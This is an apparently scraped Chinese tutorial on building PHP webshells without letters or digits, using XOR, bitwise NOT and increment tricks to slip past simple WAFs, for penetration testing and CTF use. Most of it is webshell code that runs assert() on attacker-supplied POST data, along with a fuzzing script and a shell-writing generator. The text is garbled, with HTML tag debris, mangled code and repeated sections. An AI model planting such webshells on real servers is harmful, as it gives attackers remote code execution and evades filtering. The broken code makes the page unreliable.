无数字字母WebShell技术详解<\/h1>

前言<\/h2>
本文详细解析几种不使用数字和字母构造PHP WebShell的技术，这些技术在渗透测试和CTF比赛中非常有用，可以绕过一些简单的WAF检测。<\/p>

一、使用异或(^)运算构造WebShell<\/h2>

基本原理<\/h3>
PHP中异或运算符(^)可以对字符进行按位异或操作，通过精心选择字符对，可以构造出需要的函数名如"assert"。<\/p>

实现方式<\/h3>

方法1：直接使用特殊字符<\/h4>

<?<\/span>php<\/span>
<\/span><\/span>$_=<\/span>('特殊字符1'<\/span>^<\/span>'`'<\/span>).<\/span>('特殊字符2'<\/span>^<\/span>'`'<\/span>)...<\/span>('特殊字符n'<\/span>^<\/span>'`'<\/span>);
<\/span><\/span>assert<\/span>($_POST[_<\/span>]);
<\/span><\/span><\/code><\/pre>方法2：使用chr()函数<\/h4>
<?<\/span>php<\/span>
<\/span><\/span>$_=<\/span>(chr<\/span>(0x01<\/span>)^<\/span>'`'<\/span>).<\/span>(chr<\/span>(0x13<\/span>)^<\/span>'`'<\/span>).<\/span>(chr<\/span>(0x13<\/span>)^<\/span>'`'<\/span>).<\/span>(chr<\/span>(0x05<\/span>)^<\/span>'`'<\/span>).<\/span>(chr<\/span>(0x12<\/span>)^<\/span>'`'<\/span>).<\/span>(chr<\/span>(0x14<\/span>)^<\/span>'`'<\/span>).<\/span>(chr<\/span>(0x0D<\/span>)^<\/span>']'<\/span>).<\/span>(chr<\/span>(0x2F<\/span>)^<\/span>'`'<\/span>).<\/span>(chr<\/span>(0x0E<\/span>)^<\/span>']'<\/span>).<\/span>(chr<\/span>(0x09<\/span>)^<\/span>'`'<\/span>);
<\/span><\/span>assert<\/span>($_POST[_<\/span>]);
<\/span><\/span><\/code><\/pre>方法3：使用urldecode<\/h4>
<?<\/span>php<\/span>
<\/span><\/span>$_=<\/span>(urldecode<\/span>('%01'<\/span>)^<\/span>'`'<\/span>).<\/span>(urldecode<\/span>('%13'<\/span>)^<\/span>'`'<\/span>)...<\/span>(urldecode<\/span>('%09'<\/span>)^<\/span>'`'<\/span>);
<\/span><\/span>assert<\/span>($_POST[_<\/span>]);
<\/span><\/span><\/code><\/pre>二、使用取反(~)运算构造WebShell<\/h2>
基本原理<\/h3>
PHP的取反运算符(~)可以对字符进行按位取反，通过选择特定Unicode字符，可以构造出需要的函数名。<\/p>
实现方式<\/h3>
基本形式<\/h4>
<?<\/span>php<\/span>
<\/span><\/span>$瞰=<\/span>"和"<\/span>和<\/span>"的"<\/span>半<\/span>"始"<\/span>俯<\/span>"瞰"<\/span>次<\/span>"站"<\/span>;
<\/span><\/span>assert<\/span>($_POST[_<\/span>]);
<\/span><\/span><\/code><\/pre>修改版（适用于SUCTF）<\/h4>
<?<\/span>php<\/span>
<\/span><\/span>$瞰)北<\/span>)的<\/span>)半<\/span>)拾<\/span>)说<\/span>)小<\/span>)次<\/span>)站<\/span>);
<\/span><\/span>assert<\/span>($_POST[_<\/span>]);
<\/span><\/span><\/code><\/pre>FUZZ脚本<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>$charset =<\/span> '"'<\/span>;
<\/span><\/span>for<\/span> ($i=<\/span>0<\/span>; $i <<\/span> 65536<\/span>; $i++<\/span>) {
<\/span><\/span>    $charset .=<\/span> sprintf<\/span>("\u%04s"<\/span>,dechex<\/span>($i)); \/\/ 生成 \u0000 - \uffff 字符集
<\/span><\/span><\/span><\/span>}
<\/span><\/span>$charset =<\/span> json_decode<\/span>($charset); \/\/ json_decode解码格式:json_decode('"xxxxxxxx"')
<\/span><\/span><\/span><\/span>header<\/span>('Content-Type: text\/html; charset=utf-8'<\/span>);
<\/span><\/span>for<\/span> ($i=<\/span>0<\/span>; $i <<\/span> mb_strlen<\/span>($charset,'utf-8'<\/span>); $i++<\/span>) {
<\/span><\/span>    $st =<\/span> mb_substr<\/span>($charset, $i,1<\/span>,'utf-8'<\/span>);
<\/span><\/span>    $a =<\/span> ~<\/span>($st);
<\/span><\/span>    $b =<\/span> $a[1<\/span>];
<\/span><\/span>    echo<\/span> $st.<\/span>' '<\/span>.<\/span>$b.<\/span>'<br>'<\/span>;
<\/span><\/span>}
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>生成脚本<\/h3>
# generate.php
<\/span><\/span><\/span><\/span>assert<\/span>('eval($_POST[phpfile_put_contents('<\/span>yihuo<\/span>.<\/span>php<\/span>', '<\/span><?<\/span>php<\/span> assert<\/span>'.'<\/span>eval<\/span>($_POST['<\/span>);
<\/span><\/span><\/code><\/pre>三、使用自增(++)运算构造WebShell<\/h2>
基本原理<\/h3>
PHP中可以通过字符自增来获得其他字符，从而构造出需要的函数名。<\/p>
实现方式<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>$_=<\/span>(''<\/span>);
<\/span><\/span>$__=<\/span>$_;
<\/span><\/span>$_++<\/span>; \/\/ A
<\/span><\/span><\/span><\/span>$__++<\/span>; \/\/ B
<\/span><\/span><\/span>\/\/ 继续自增构造需要的字符
<\/span><\/span><\/span><\/span>assert<\/span>($_POST[_<\/span>]);
<\/span><\/span><\/code><\/pre>总结<\/h2>

异或运算<\/strong>：通过字符对的异或运算构造目标字符串<\/li>
取反运算<\/strong>：利用Unicode字符的取反结果构造目标字符串<\/li>
自增运算<\/strong>：通过字符自增逐步构造目标字符串<\/li>
<\/ol>
这些技术的关键在于利用PHP的语言特性绕过字符限制，在渗透测试和CTF比赛中具有实际应用价值。<\/p>

无数字字母WebShell技术详解<\/h1>

前言<\/h2> 本文详细解析几种不使用数字和字母构造PHP WebShell的技术，这些技术在渗透测试和CTF比赛中非常有用，可以绕过一些简单的WAF检测。<\/p>

一、使用异或(^)运算构造WebShell<\/h2>

基本原理<\/h3> PHP中异或运算符(^)可以对字符进行按位异或操作，通过精心选择字符对，可以构造出需要的函数名如"assert"。<\/p>

实现方式<\/h3>

二、使用取反(~)运算构造WebShell<\/h2>

基本原理<\/h3> PHP的取反运算符(~)可以对字符进行按位取反，通过选择特定Unicode字符，可以构造出需要的函数名。<\/p>

实现方式<\/h3>

三、使用自增(++)运算构造WebShell<\/h2>

基本原理<\/h3> PHP中可以通过字符自增来获得其他字符，从而构造出需要的函数名。<\/p>

前言<\/h2>
本文详细解析几种不使用数字和字母构造PHP WebShell的技术，这些技术在渗透测试和CTF比赛中非常有用，可以绕过一些简单的WAF检测。<\/p>

基本原理<\/h3>
PHP中异或运算符(^)可以对字符进行按位异或操作，通过精心选择字符对，可以构造出需要的函数名如"assert"。<\/p>

基本原理<\/h3>
PHP的取反运算符(~)可以对字符进行按位取反，通过选择特定Unicode字符，可以构造出需要的函数名。<\/p>

基本原理<\/h3>
PHP中可以通过字符自增来获得其他字符，从而构造出需要的函数名。<\/p>